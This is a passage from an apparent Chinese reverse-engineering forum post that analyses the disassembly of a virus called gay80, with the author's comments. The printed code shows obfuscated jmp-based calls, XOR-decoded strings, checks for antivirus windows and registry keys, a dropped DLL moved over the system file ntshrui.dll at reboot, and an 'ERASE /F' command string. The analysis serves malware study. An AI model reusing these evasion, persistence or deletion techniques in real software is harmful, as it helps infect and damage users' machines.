此贴源于http://bbs.pediy.com/showthread.php?t=119083
这处,刚好闲着无事,就拿来看看,第一次写这个分析的,可能分析都是错的,呵呵,请大家不吝赐教哈
开始啦::
首先罗嗦一句,整个程序都是采用自己push 然后jmp的调用方式,跟call其实都一样,不过
用jmp稍微麻烦一点,总得来回计算返回地址
程序入口点:
00404010 . 54 PUSH ESP
00404011 . 68 E8414000 PUSH gay80.004041E8//后面要jmp 的地址
00404016 . 68 36404000 PUSH gay80.00404036//EnumWindows 参数
0040401B . 50 PUSH EAX//EnumWindows 参数
0040401C . B8 1D404000 MOV EAX,gay80.0040401D
00404021 . 0FB7C0 MOVZX EAX,AX
00404024 . C1E8 04 SHR EAX,4
00404027 . 83E8 02 SUB EAX,2
0040402A . 8B0424 MOV EAX,DWORD PTR SS:[ESP]
0040402D . 83C4 04 ADD ESP,4 //类似这样的,都是为了模仿call,设置返回值
00404030 .- FF25 BA524000 JMP DWORD PTR DS:[<&USER32.EnumWindows>] ; USER32.EnumWindows
来到系统空间EnumWindows里面
再EnumWindows里面,跟着往里面走
77D2A4E0 FF75 14 PUSH DWORD PTR SS:[EBP+14]
77D2A4E3 FF36 PUSH DWORD PTR DS:[ESI]
77D2A4E5 FF55 10 CALL DWORD PTR SS:[EBP+10] ; gay80.004041E8
就开始调用真正的入口了
整个病毒都是通过在前面push参数和返回地址,然后通过jmp来实现call的
我们来到这个
00404208 > \8B1424 MOV EDX,DWORD PTR SS:[ESP] ; gay80.00404204,这个是上面push的
0040420B . 83C4 04 ADD ESP,4 //本来返回地址应该是00404204的,可是add esp后变成会返回到系统空间了
0040420E . FF02 INC DWORD PTR DS:[EDX]//00404204地址处,根据这个值做不同的跳转
00404210 . 833A 01 CMP DWORD PTR DS:[EDX],1
00404213 . 74 2B JE SHORT gay80.00404240
00404215 . 833A 02 CMP DWORD PTR DS:[EDX],2
00404218 . 74 26 JE SHORT gay80.00404240
0040421A . 833A 03 CMP DWORD PTR DS:[EDX],3
0040421D . 74 21 JE SHORT gay80.00404240
0040421F . 833A 04 CMP DWORD PTR DS:[EDX],4
00404222 . 74 1C JE SHORT gay80.00404240
00404224 . 833A 05 CMP DWORD PTR DS:[EDX],5
00404227 . 74 17 JE SHORT gay80.00404240//前面这几个跳转的地址都一样的,跟一个就行了,都调回来了
00404229 . 833A 06 CMP DWORD PTR DS:[EDX],6
0040422C . 0F84 F9050000 JE gay80.0040482B //最终到这里面,跟下去
00404232 . 833A 07 CMP DWORD PTR DS:[EDX],7
00404235 . 0F84 F0050000 JE gay80.0040482B
0040423B . 31C0 XOR EAX,EAX
0040423D . C2 0800 RETN 8
00404240 > 31C0 XOR EAX,EAX
00404242 . 40 INC EAX
00404243 . C2 0800 RETN 8
0040482B > \8B6424 08 MOV ESP,DWORD PTR SS:[ESP+8]
0040482F . 68 4E484000 PUSH gay80.0040484E
00404834 . 50 PUSH EAX
00404835 . B8 36484000 MOV EAX,gay80.00404836
0040483A . 0FB7C0 MOVZX EAX,AX
0040483D . C1E8 04 SHR EAX,4
00404840 . 83E8 02 SUB EAX,2
00404843 . 8B0424 MOV EAX,DWORD PTR SS:[ESP]
00404846 . 83C4 04 ADD ESP,4
00404849 . E9 66040000 JMP gay80.00404CB4
这里面调用了个PostQuitMessage和GetMessage
暂时不知道干嘛的
0040484E . FF35 40104000 PUSH DWORD PTR DS:[401040]
00404854 . 6A 40 PUSH 40
00404856 . 68 76484000 PUSH gay80.00404876
0040485B . 50 PUSH EAX
0040485C . B8 5D484000 MOV EAX,gay80.0040485D
00404861 . 0FB7C0 MOVZX EAX,AX
00404864 . C1E8 04 SHR EAX,4
00404867 . 83E8 02 SUB EAX,2
0040486A . 8B0424 MOV EAX,DWORD PTR SS:[ESP]
0040486D . 83C4 04 ADD ESP,4
00404870 .- FF25 08514000 JMP DWORD PTR DS:[<&KERNEL32.GlobalAlloc>] ; kernel32.GlobalAlloc//分配了块2e00的大小内存块
00404876 . 97 XCHG EAX,EDI
00404877 . BE 44104000 MOV ESI,gay80.00401044
0040487C . 68 9B484000 PUSH gay80.0040489B
00404881 . 50 PUSH EAX
00404882 . B8 83484000 MOV EAX,gay80.00404883
00404887 . 0FB7C0 MOVZX EAX,AX
0040488A . C1E8 04 SHR EAX,4
0040488D . 83E8 02 SUB EAX,2
00404890 . 8B0424 MOV EAX,DWORD PTR SS:[ESP]
00404893 . 83C4 04 ADD ESP,4
00404896 . E9 87020000 JMP gay80.00404B22//跟下去,这里来回折腾,就是将401044处数据写入到这个分配好的内存中去
00404B22 > \60 PUSHAD
00404B23 . FC CLD
00404B24 . B2 80 MOV DL,80
00404B26 . 31DB XOR EBX,EBX
00404B28 > A4 MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]//将401044处的代码移到刚才分配的内存中
//大小为一个字节
00404B29 . B3 02 MOV BL,2
00404B2B > 68 4A4B4000 PUSH gay80.00404B4A
00404B30 . 50 PUSH EAX
00404B31 . B8 324B4000 MOV EAX,gay80.00404B32
00404B36 . 0FB7C0 MOVZX EAX,AX
00404B39 . C1E8 04 SHR EAX,4
00404B3C . 83E8 02 SUB EAX,2
00404B3F . 8B0424 MOV EAX,DWORD PTR SS:[ESP]
00404B42 . 83C4 04 ADD ESP,4
00404B45 . E9 16010000 JMP gay80.00404C60//只是增加了下esi
00404B4A .^ 73 DC JNB SHORT gay80.00404B28//这里来回了几趟,往刚才分配的内存开头写入了MZ的标志
00404B4C . 31C9 XOR ECX,ECX
00404B4E . 68 6D4B4000 PUSH gay80.00404B6D
00404B53 . 50 PUSH EAX
00404B54 . B8 554B4000 MOV EAX,gay80.00404B55
00404B59 . 0FB7C0 MOVZX EAX,AX
00404B5C . C1E8 04 SHR EAX,4
00404B5F . 83E8 02 SUB EAX,2
00404B62 . 8B0424 MOV EAX,DWORD PTR SS:[ESP]
00404B65 . 83C4 04 ADD ESP,4
00404B68 . E9 F3000000 JMP gay80.00404C60
00404B6D . 73 57 JNB SHORT gay80.00404BC6
00404B6F . 31C0 XOR EAX,EAX
00404B71 . 68 904B4000 PUSH gay80.00404B90
00404B76 . 50 PUSH EAX
00404B77 . B8 784B4000 MOV EAX,gay80.00404B78
00404B7C . 0FB7C0 MOVZX EAX,AX
00404B7F . C1E8 04 SHR EAX,4
00404B82 . 83E8 02 SUB EAX,2
00404B85 . 8B0424 MOV EAX,DWORD PTR SS:[ESP]
00404B88 . 83C4 04 ADD ESP,4
00404B8B . E9 D0000000 JMP gay80.00404C60
00404B90 . 73 75 JNB SHORT gay80.00404C07
00404B92 . B3 02 MOV BL,2
00404B94 . 41 INC ECX
00404B95 . B0 10 MOV AL,10
00404B97 > 68 B64B4000 PUSH gay80.00404BB6
00404B9C . 50 PUSH EAX
00404B9D . B8 9E4B4000 MOV EAX,gay80.00404B9E
00404BA2 . 0FB7C0 MOVZX EAX,AX
00404BA5 . C1E8 04 SHR EAX,4
00404BA8 . 83E8 02 SUB EAX,2
00404BAB . 8B0424 MOV EAX,DWORD PTR SS:[ESP]
00404BAE . 83C4 04 ADD ESP,4
00404BB1 . E9 AA000000 JMP gay80.00404C60////
00404BB6 . 10C0 ADC AL,AL
00404BB8 .^ 73 DD JNB SHORT gay80.00404B97
00404BBA . 0F85 8E000000 JNZ gay80.00404C4E
00404BC0 . AA STOS BYTE PTR ES:[EDI]
00404BC1 .^ E9 65FFFFFF JMP gay80.00404B2B
00404BC6 > 68 E54B4000 PUSH gay80.00404BE5
00404BCB . 50 PUSH EAX
00404BCC . B8 CD4B4000 MOV EAX,gay80.00404BCD
00404BD1 . 0FB7C0 MOVZX EAX,AX
00404BD4 . C1E8 04 SHR EAX,4
00404BD7 . 83E8 02 SUB EAX,2
00404BDA . 8B0424 MOV EAX,DWORD PTR SS:[ESP]
00404BDD . 83C4 04 ADD ESP,4
00404BE0 . E9 87000000 JMP gay80.00404C6C
00404BE5 . 29D9 SUB ECX,EBX
00404BE7 . 75 2B JNZ SHORT gay80.00404C14
00404BE9 . 68 054C4000 PUSH gay80.00404C05
00404BEE . 50 PUSH EAX
00404BEF . B8 F04B4000 MOV EAX,gay80.00404BF0
00404BF4 . 0FB7C0 MOVZX EAX,AX
00404BF7 . C1E8 04 SHR EAX,4
00404BFA . 83E8 02 SUB EAX,2
00404BFD . 8B0424 MOV EAX,DWORD PTR SS:[ESP]
00404C00 . 83C4 04 ADD ESP,4
00404C03 . EB 65 JMP SHORT gay80.00404C6A
00404C05 . EB 43 JMP SHORT gay80.00404C4A
00404C07 > AC LODS BYTE PTR DS:[ESI]
00404C08 . D1E8 SHR EAX,1
00404C0A . 0F84 9A000000 JE gay80.00404CAA
00404C10 . 11C9 ADC ECX,ECX
00404C12 . EB 33 JMP SHORT gay80.00404C47
00404C14 > 91 XCHG EAX,ECX
00404C15 . 48 DEC EAX
00404C16 . C1E0 08 SHL EAX,8
00404C19 . AC LODS BYTE PTR DS:[ESI]
00404C1A . 68 364C4000 PUSH gay80.00404C36
00404C1F . 50 PUSH EAX
00404C20 . B8 214C4000 MOV EAX,gay80.00404C21
00404C25 . 0FB7C0 MOVZX EAX,AX
00404C28 . C1E8 04 SHR EAX,4
00404C2B . 83E8 02 SUB EAX,2
00404C2E . 8B0424 MOV EAX,DWORD PTR SS:[ESP]
00404C31 . 83C4 04 ADD ESP,4
00404C34 . EB 34 JMP SHORT gay80.00404C6A
00404C36 . 3D 007D0000 CMP EAX,7D00
00404C3B . 73 0A JNB SHORT gay80.00404C47
00404C3D . 80FC 05 CMP AH,5
00404C40 . 73 06 JNB SHORT gay80.00404C48
00404C42 . 83F8 7F CMP EAX,7F
00404C45 . 77 02 JA SHORT gay80.00404C49
00404C47 > 41 INC ECX
00404C48 > 41 INC ECX
00404C49 > 95 XCHG EAX,EBP
00404C4A > 89E8 MOV EAX,EBP
00404C4C . B3 01 MOV BL,1
00404C4E > 56 PUSH ESI
00404C4F . 89FE MOV ESI,EDI
00404C51 . 29C6 SUB ESI,EAX
00404C53 . F3:A4 REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI>
00404C55 . 8B3424 MOV ESI,DWORD PTR SS:[ESP]
00404C58 . 83C4 04 ADD ESP,4
00404C5B .^ E9 CBFEFFFF JMP gay80.00404B2B
00404C60 > 00D2 ADD DL,DL
00404C62 . 75 05 JNZ SHORT gay80.00404C69
00404C64 . 8A16 MOV DL,BYTE PTR DS:[ESI]
00404C66 . 46 INC ESI
00404C67 . 10D2 ADC DL,DL
00404C69 > C3 RETN
00404C6A > 31C9 XOR ECX,ECX
00404C6C > 41 INC ECX
00404C6D > 68 894C4000 PUSH gay80.00404C89
00404C72 . 50 PUSH EAX
00404C73 . B8 744C4000 MOV EAX,gay80.00404C74
00404C78 . 0FB7C0 MOVZX EAX,AX
00404C7B . C1E8 04 SHR EAX,4
00404C7E . 83E8 02 SUB EAX,2
00404C81 . 8B0424 MOV EAX,DWORD PTR SS:[ESP]
00404C84 . 83C4 04 ADD ESP,4
00404C87 .^ EB D7 JMP SHORT gay80.00404C60
00404C89 . 11C9 ADC ECX,ECX
00404C8B . 68 A74C4000 PUSH gay80.00404CA7
00404C90 . 50 PUSH EAX
00404C91 . B8 924C4000 MOV EAX,gay80.00404C92
00404C96 . 0FB7C0 MOVZX EAX,AX
00404C99 . C1E8 04 SHR EAX,4
00404C9C . 83E8 02 SUB EAX,2
00404C9F . 8B0424 MOV EAX,DWORD PTR SS:[ESP]
00404CA2 . 83C4 04 ADD ESP,4
00404CA5 .^ EB B9 JMP SHORT gay80.00404C60
00404CA7 .^ 72 C4 JB SHORT gay80.00404C6D
00404CA9 . C3 RETN
00404CAA > 2B7C24 28 SUB EDI,DWORD PTR SS:[ESP+28]
00404CAE . 897C24 1C MOV DWORD PTR SS:[ESP+1C],EDI
00404CB2 . 61 POPAD
00404CB3 . C3 RETN
//从上面可以看出这里其实就是将401044拷贝到分配的内存里面,后面用这个内存在写入到dll里面
0040489B . 60 PUSHAD
0040489C . B9 5D000000 MOV ECX,5D
004048A1 . BA 5E534000 MOV EDX,gay80.0040535E ; ASCII "SOFTWARE\JiangMin"
004048A6 > 80740A FF 10 XOR BYTE PTR DS:[EDX+ECX-1],10//对40535e这处进行解密,就是简单的异或下
.//得到原始的真实字符串0040535F 4F 46 54 57 41 52 45 5C 4A 69 61 6E 67 4D 69 6E OFTWARE\JiangMin
0040536F 00 25 41 50 50 44 41 54 41 25 5C 6B 65 72 6E 65 .%APPDATA%\kerne
0040537F 6C 6C 2E 64 6C 6C 00 25 77 69 6E 64 69 72 25 5C ll.dll.%windir%\
0040538F 6E 74 73 68 72 75 69 2E 64 6C 6C 00 61 6E 74 69 ntshrui.dll.anti
0040539F 61 6E 74 69 00 25 43 6F 6D 53 70 65 63 25 20 2F anti.%ComSpec% /
004053AF 63 20 45 52 41 53 45 20 2F 46 20 00 00 00 c ERASE /F ...
004048AB .^ E2 F9 LOOPD SHORT gay80.004048A6
004048AD . 61 POPAD
004048AE . 55 PUSH EBP
004048AF . 89E5 MOV EBP,ESP
004048B1 . 81EC 04010000 SUB ESP,104
004048B7 . 60 PUSHAD
004048B8 . 6A 3C PUSH 3C
004048BA . 8B0C24 MOV ECX,DWORD PTR SS:[ESP]
004048BD . 83C4 04 ADD ESP,4
004048C0 . FC CLD
004048C1 . 81C7 00100000 ADD EDI,1000
004048C7 . BE 00104000 MOV ESI,gay80.00401000
004048CC . F3:A4 REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI] ; esi=401000 edi=a4fc0 ecx=3c
//往分配的内存的0x1000处写入401000处3c个长度的code
000A4FC0 43 0F 01 09 00 30 5D 56 58 55 1E 43 45 51 50 4B C..0]VXUCEQPK
000A4FD0 55 1E 53 58 5C 39 30 30 30 37 31 39 30 30 30 37 USX\90007190007
000A4FE0 31 39 30 30 30 37 31 39 30 30 30 37 31 39 30 30 1900071900071900
000A4FF0 30 37 31 39 30 30 30 37 71 26 30 30 07190007q&00
004048CE . 61 POPAD
004048CF . 89E6 MOV ESI,ESP
004048D1 . 68 F0484000 PUSH gay80.004048F0
004048D6 . 50 PUSH EAX
004048D7 . B8 D8484000 MOV EAX,gay80.004048D8
004048DC . 0FB7C0 MOVZX EAX,AX
004048DF . C1E8 04 SHR EAX,4
004048E2 . 83E8 02 SUB EAX,2
004048E5 . 8B0424 MOV EAX,DWORD PTR SS:[ESP]
004048E8 . 83C4 04 ADD ESP,4
004048EB . E9 17040000 JMP gay80.00404D07
看看404D07是啥
00404D07 > \52 PUSH EDX
00404D08 . 6A 72 PUSH 72
00404D0A . 68 656E7465 PUSH 65746E65
00404D0F . 68 72736363 PUSH 63637372
00404D14 . 89E0 MOV EAX,ESP
00404D16 . 68 324D4000 PUSH gay80.00404D32 ; ASCII "cc"/..Findwindow的Title参数
00404D1B . 50 PUSH EAX
00404D1C . B8 1D4D4000 MOV EAX,gay80.00404D1D
00404D21 . 0FB7C0 MOVZX EAX,AX
00404D24 . C1E8 04 SHR EAX,4
00404D27 . 83E8 02 SUB EAX,2
00404D2A . 8B0424 MOV EAX,DWORD PTR SS:[ESP]
00404D2D . 83C4 04 ADD ESP,4
00404D30 . EB 03 JMP SHORT gay80.00404D35//其实就是call 00404D35
00404D32 . 63 63 00 ASCII "cc",0
00404D35 > 50 PUSH EAX
00404D36 . 68 564D4000 PUSH gay80.00404D56
00404D3B . 50 PUSH EAX
00404D3C . B8 3D4D4000 MOV EAX,gay80.00404D3D
00404D41 . 0FB7C0 MOVZX EAX,AX
00404D44 . C1E8 04 SHR EAX,4
00404D47 . 83E8 02 SUB EAX,2
00404D4A . 8B0424 MOV EAX,DWORD PTR SS:[ESP]
00404D4D . 83C4 04 ADD ESP,4
00404D50 .- FF25 BE524000 JMP DWORD PTR DS:[<&USER32.FindWindowA>] ; USER32.FindWindowA
invoke FindWindow, "rsccenter',"cc"
00404D56 . 83C4 0C ADD ESP,0C
00404D59 . 85C0 TEST EAX,EAX
00404D5B . 75 09 JNZ SHORT gay80.00404D66
00404D5D . 31C0 XOR EAX,EAX
00404D5F . 8B1424 MOV EDX,DWORD PTR SS:[ESP]
00404D62 . 83C4 04 ADD ESP,4
00404D65 . C3 RETN //返回到4048F0处继续开始
00404D66 > B8 01000000 MOV EAX,1
00404D6B . 8B1424 MOV EDX,DWORD PTR SS:[ESP]
00404D6E . 83C4 04 ADD ESP,4
00404D71 . C3 RETN
//可以看出404D07段就是findwindow下,找到就返回TRUE
004048F0 . BA 86534000 MOV EDX,gay80.00405386 ; ASCII "%windir%\ntshrui.dll"
004048F5 . 85C0 TEST EAX,EAX
004048F7 . 75 68 JNZ SHORT gay80.00404961
004048F9 . 68 18494000 PUSH gay80.00404918
004048FE . 50 PUSH EAX
004048FF . B8 00494000 MOV EAX,gay80.00404900
00404904 . 0FB7C0 MOVZX EAX,AX
00404907 . C1E8 04 SHR EAX,4
0040490A . 83E8 02 SUB EAX,2
0040490D . 8B0424 MOV EAX,DWORD PTR SS:[ESP]
00404910 . 83C4 04 ADD ESP,4
00404913 . E9 5A040000 JMP gay80.00404D72///又跑下去findwindow去了
invoke FindWindow, "_CLS_SessionAgent","_CLS_SessionAgent"
00404918 . BA 86534000 MOV EDX,gay80.00405386 ; ASCII "%windir%\ntshrui.dll"
0040491D . 85C0 TEST EAX,EAX
0040491F . 75 40 JNZ SHORT gay80.00404961//要是rsccenter或者_CLS_SessionAgent类名的窗口
找到的话就不用打开注册表了
00404921 . 6A 00 PUSH 0
00404923 . 54 PUSH ESP
00404924 . 68 5E534000 PUSH gay80.0040535E ; ASCII "SOFTWARE\JiangMin"
00404929 . 68 02000080 PUSH 80000002
0040492E . 68 4E494000 PUSH gay80.0040494E
00404933 . 50 PUSH EAX
00404934 . B8 35494000 MOV EAX,gay80.00404935
00404939 . 0FB7C0 MOVZX EAX,AX
0040493C . C1E8 04 SHR EAX,4
0040493F . 83E8 02 SUB EAX,2
00404942 . 8B0424 MOV EAX,DWORD PTR SS:[ESP]
00404945 . 83C4 04 ADD ESP,4
00404948 .- FF25 48534000 JMP DWORD PTR DS:[<&ADVAPI32.RegOpenKeyA>] ; ADVAPI32.RegOpenKeyA
0040494E . 8B0C24 MOV ECX,DWORD PTR SS:[ESP]
00404951 . 83C4 04 ADD ESP,4
00404954 . BA 86534000 MOV EDX,gay80.00405386 ; ASCII "%windir%\ntshrui.dll"
00404959 . 85C0 TEST EAX,EAX
0040495B . 0F85 85000000 JNZ gay80.004049E6//打开失败的话就到4049e6处
00404961 > BA 70534000 MOV EDX,gay80.00405370 ; ASCII "%APPDATA%\kernell.dll"
00404966 . 68 04010000 PUSH 104
0040496B . 56 PUSH ESI
0040496C . 52 PUSH EDX
0040496D . 68 8D494000 PUSH gay80.0040498D
00404972 . 50 PUSH EAX
00404973 . B8 74494000 MOV EAX,gay80.00404974
00404978 . 0FB7C0 MOVZX EAX,AX
0040497B . C1E8 04 SHR EAX,4
0040497E . 83E8 02 SUB EAX,2
00404981 . 8B0424 MOV EAX,DWORD PTR SS:[ESP]
00404984 . 83C4 04 ADD ESP,4
00404987 .- FF25 E8504000 JMP DWORD PTR DS:[<&KERNEL32.ExpandEnvironmentStr>; kernel32.ExpandEnvironmentStringsA//
0040498D . 8D46 64 LEA EAX,DWORD PTR DS:[ESI+64]
00404990 . 68 A0000000 PUSH 0A0
00404995 . 50 PUSH EAX
00404996 . 68 86534000 PUSH gay80.00405386 ; ASCII "%windir%\ntshrui.dll"
0040499B . 68 BB494000 PUSH gay80.004049BB
004049A0 . 50 PUSH EAX
004049A1 . B8 A2494000 MOV EAX,gay80.004049A2
004049A6 . 0FB7C0 MOVZX EAX,AX
004049A9 . C1E8 04 SHR EAX,4
004049AC . 83E8 02 SUB EAX,2
004049AF . 8B0424 MOV EAX,DWORD PTR SS:[ESP]
004049B2 . 83C4 04 ADD ESP,4
004049B5 .- FF25 E8504000 JMP DWORD PTR DS:[<&KERNEL32.ExpandEnvir>; kernel32.ExpandEnvironmentStringsA//
004049BB . 8D46 64 LEA EAX,DWORD PTR DS:[ESI+64]
004049BE . 6A 04 PUSH 4
004049C0 . 50 PUSH EAX
004049C1 . 56 PUSH ESI
004049C2 . 68 E2494000 PUSH gay80.004049E2
004049C7 . 50 PUSH EAX
004049C8 . B8 C9494000 MOV EAX,gay80.004049C9
004049CD . 0FB7C0 MOVZX EAX,AX
004049D0 . C1E8 04 SHR EAX,4
004049D3 . 83E8 02 SUB EAX,2
004049D6 . 8B0424 MOV EAX,DWORD PTR SS:[ESP]
004049D9 . 83C4 04 ADD ESP,4
004049DC .- FF25 14514000 JMP DWORD PTR DS:[<&KERNEL32.MoveFileExA>; kernel32.MoveFileExA
0006FDA8 004049E2 /CALL 到 MoveFileExA
0006FDAC 0006FDB8 |ExistingName = "C:\Documents and Settings\Administrator\Application Data\kernell.dll"
0006FDB0 0006FE1C |NewName = "C:\WINDOWS\ntshrui.dll"
0006FDB4 00000004 \Flags = DELAY_UNTIL_REBOOT
//将kernel.dll映射到ntshrui.dll,这样开机启动后explorer加载该dll就是加载ntshrui.dll了
。、、、、、、、、、、、、、、、、、、、、、、、、、、
、、、、、、、、、、、、、、、、、、、、、、、、、、、
004049E6 > \68 04010000 PUSH 104
004049EB . 56 PUSH ESI
004049EC . 52 PUSH EDX
004049ED . 68 0D4A4000 PUSH gay80.00404A0D
004049F2 . 50 PUSH EAX
004049F3 . B8 F4494000 MOV EAX,gay80.004049F4
004049F8 . 0FB7C0 MOVZX EAX,AX
004049FB . C1E8 04 SHR EAX,4
004049FE . 83E8 02 SUB EAX,2
00404A01 . 8B0424 MOV EAX,DWORD PTR SS:[ESP]
00404A04 . 83C4 04 ADD ESP,4
00404A07 .- FF25 E8504000 JMP DWORD PTR DS:[<&KERNEL32.ExpandEnvironmentStr>; kernel32.ExpandEnvironmentStringsA
//0006FDAC 00405386 |SrcString = "%windir%\ntshrui.dll"
注册成环境变量
00404A0D . 89F2 MOV EDX,ESI
00404A0F > 68 2E4A4000 PUSH gay80.00404A2E
00404A14 . 50 PUSH EAX
00404A15 . B8 164A4000 MOV EAX,gay80.00404A16
00404A1A . 0FB7C0 MOVZX EAX,AX
00404A1D . C1E8 04 SHR EAX,4
00404A20 . 83E8 02 SUB EAX,2
00404A23 . 8B0424 MOV EAX,DWORD PTR SS:[ESP]
00404A26 . 83C4 04 ADD ESP,4
00404A29 .^ E9 54FCFFFF JMP gay80.00404682//这里面还是继续设置了环境变量
//并且得到临时目录,然后创建了名为32110.tmp的临时文件,然后删除,再将ntshrui.DLL映射到这个temp下面
//换成这个名字
00404A2E . FF35 40104000 PUSH DWORD PTR DS:[401040]
00404A34 . 57 PUSH EDI
00404A35 . 52 PUSH EDX
00404A36 . 68 554A4000 PUSH gay80.00404A55 ; ASCII "RhuJ@"
00404A3B . 50 PUSH EAX
00404A3C . B8 3D4A4000 MOV EAX,gay80.00404A3D
00404A41 . 0FB7C0 MOVZX EAX,AX
00404A44 . C1E8 04 SHR EAX,4
00404A47 . 83E8 02 SUB EAX,2
00404A4A . 8B0424 MOV EAX,DWORD PTR SS:[ESP]
00404A4D . 83C4 04 ADD ESP,4
00404A50 .^ E9 B2FAFFFF JMP gay80.00404507
//跟进去看看
00404507 > /60 PUSHAD
00404508 . |89E5 MOV EBP,ESP
0040450A . |31C0 XOR EAX,EAX
0040450C . |50 PUSH EAX
0040450D . |50 PUSH EAX
0040450E . |6A 01 PUSH 1
00404510 . |50 PUSH EAX
00404511 . |50 PUSH EAX
00404512 . |68 00000040 PUSH 40000000
00404517 . |FF75 24 PUSH DWORD PTR SS:[EBP+24]
0040451A . |68 3A454000 PUSH gay80.0040453A
0040451F . |50 PUSH EAX
00404520 . |B8 21454000 MOV EAX,gay80.00404521
00404525 . |0FB7C0 MOVZX EAX,AX
00404528 . |C1E8 04 SHR EAX,4
0040452B . |83E8 02 SUB EAX,2
0040452E . |8B0424 MOV EAX,DWORD PTR SS:[ESP]
00404531 . |83C4 04 ADD ESP,4
00404534 .-|FF25 D8504000 JMP DWORD PTR DS:[<&KERNEL32.CreateFileA>] ; kernel32.CreateFileA
.//创建C:\\WINDOWS\\ntshrui.dll
0040453A . |83F8 FF CMP EAX,-1
0040453D . |74 5B JE SHORT gay80.0040459A
0040453F . |93 XCHG EAX,EBX
00404540 . |0F31 RDTSC
00404542 . |8B55 28 MOV EDX,DWORD PTR SS:[EBP+28]
00404545 . |8742 04 XCHG DWORD PTR DS:[EDX+4],EAX
00404548 . |6A 00 PUSH 0
0040454A . |54 PUSH ESP
0040454B . |FF75 2C PUSH DWORD PTR SS:[EBP+2C]
0040454E . |FF75 28 PUSH DWORD PTR SS:[EBP+28]
00404551 . |53 PUSH EBX
00404552 . |68 72454000 PUSH gay80.00404572
00404557 . |50 PUSH EAX
00404558 . |B8 59454000 MOV EAX,gay80.00404559
0040455D . |0FB7C0 MOVZX EAX,AX
00404560 . |C1E8 04 SHR EAX,4
00404563 . |83E8 02 SUB EAX,2
00404566 . |8B0424 MOV EAX,DWORD PTR SS:[ESP]
00404569 . |83C4 04 ADD ESP,4
0040456C .-|FF25 24514000 JMP DWORD PTR DS:[<&KERNEL32.WriteFile>] ; kernel32.WriteFile
//从writefile参数可以知道,其实就是将我们前面分配的内存中的数据写入到这个dll中
00404572 . |53 PUSH EBX
00404573 . |68 93454000 PUSH gay80.00404593
00404578 . |50 PUSH EAX
00404579 . |B8 7A454000 MOV EAX,gay80.0040457A
0040457E . |0FB7C0 MOVZX EAX,AX
00404581 . |C1E8 04 SHR EAX,4
00404584 . |83E8 02 SUB EAX,2
00404587 . |8B0424 MOV EAX,DWORD PTR SS:[ESP]
0040458A . |83C4 04 ADD ESP,4
0040458D .-|FF25 D4504000 JMP DWORD PTR DS:[<&KERNEL32.CloseHandle>] ; kernel32.CloseHandle
00404593 . |61 POPAD
00404594 . |29C0 SUB EAX,EAX
00404596 . |40 INC EAX
00404597 . |C2 0C00 RETN 0C
0040459A > |61 POPAD
0040459B . |31C0 XOR EAX,EAX
0040459D . |C2 0C00 RETN 0C
接着来看..
00404A55 . 52 68 75 4A 4>ASCII "RhuJ@",0
00404A5B . 50 PUSH EAX
00404A5C . B8 5D4A4000 MOV EAX,gay80.00404A5D
00404A61 . 0FB7C0 MOVZX EAX,AX
00404A64 . C1E8 04 SHR EAX,4
00404A67 . 83E8 02 SUB EAX,2
00404A6A . 8B0424 MOV EAX,DWORD PTR SS:[ESP]
00404A6D . 83C4 04 ADD ESP,4
00404A70 .^ E9 21F9FFFF JMP gay80.00404396
00404396 > /60 PUSHAD
00404397 . |8B7424 24 MOV ESI,DWORD PTR SS:[ESP+24]
0040439B . |C8 040100 ENTER 104,0
0040439F . |89E7 MOV EDI,ESP
004043A1 . |68 04010000 PUSH 104
004043A6 . |57 PUSH EDI
004043A7 . |68 C3434000 PUSH gay80.004043C3 ; ASCII "%windir%\notepad.exe"
004043AC . |50 PUSH EAX
004043AD . |B8 AE434000 MOV EAX,gay80.004043AE
004043B2 . |0FB7C0 MOVZX EAX,AX
004043B5 . |C1E8 04 SHR EAX,4
004043B8 . |83E8 02 SUB EAX,2
004043BB . |8B0424 MOV EAX,DWORD PTR SS:[ESP]
004043BE . |83C4 04 ADD ESP,4
004043C1 . |EB 15 JMP SHORT gay80.004043D8.//call下面
004043C3 . |25 77 69 6E 6>ASCII "%windir%\notepad"
004043D3 . |2E 65 78 65 0>ASCII ".exe",0
004043D8 > |68 F8434000 PUSH gay80.004043F8
004043DD . |50 PUSH EAX
004043DE . |B8 DF434000 MOV EAX,gay80.004043DF
004043E3 . |0FB7C0 MOVZX EAX,AX
004043E6 . |C1E8 04 SHR EAX,4
004043E9 . |83E8 02 SUB EAX,2
004043EC . |8B0424 MOV EAX,DWORD PTR SS:[ESP]
004043EF . |83C4 04 ADD ESP,4
004043F2 .-|FF25 E8504000 JMP DWORD PTR DS:[<&KERNEL32.ExpandEnvironmentStr>; kernel32.ExpandEnvironmentStringsA
//将0006FC7C 004043C3 |SrcString = "%windir%\notepad.exe"
设置为环境变量
004043F8 . |29D2 SUB EDX,EDX
004043FA . |52 PUSH EDX
004043FB . |52 PUSH EDX
004043FC . |6A 03 PUSH 3
004043FE . |52 PUSH EDX
004043FF . |6A 01 PUSH 1
00404401 . |68 00000080 PUSH 80000000
00404406 . |57 PUSH EDI
00404407 . |68 27444000 PUSH gay80.00404427
0040440C . |50 PUSH EAX
0040440D . |B8 0E444000 MOV EAX,gay80.0040440E
00404412 . |0FB7C0 MOVZX EAX,AX
00404415 . |C1E8 04 SHR EAX,4
00404418 . |83E8 02 SUB EAX,2
0040441B . |8B0424 MOV EAX,DWORD PTR SS:[ESP]
0040441E . |83C4 04 ADD ESP,4 ; notpe.exe
00404421 .-|FF25 D8504000 JMP DWORD PTR DS:[<&KERNEL32.CreateFileA>] ; kernel32.CreateFileA
、、打开C:\\WINDOWS\\NOTEPA.exe
00404427 . |83F8 FF CMP EAX,-1
0040442A . |0F84 D2000000 JE gay80.00404502
00404430 . |93 XCHG EAX,EBX
00404431 . |8D57 18 LEA EDX,DWORD PTR DS:[EDI+18]
00404434 . |52 PUSH EDX
00404435 . |8D57 10 LEA EDX,DWORD PTR DS:[EDI+10]
00404438 . |52 PUSH EDX
00404439 . |8D57 08 LEA EDX,DWORD PTR DS:[EDI+8]
0040443C . |52 PUSH EDX
0040443D . |53 PUSH EBX
0040443E . |68 5E444000 PUSH gay80.0040445E
00404443 . |50 PUSH EAX
00404444 . |B8 45444000 MOV EAX,gay80.00404445
00404449 . |0FB7C0 MOVZX EAX,AX
0040444C . |C1E8 04 SHR EAX,4
0040444F . |83E8 02 SUB EAX,2
00404452 . |8B0424 MOV EAX,DWORD PTR SS:[ESP]
00404455 . |83C4 04 ADD ESP,4
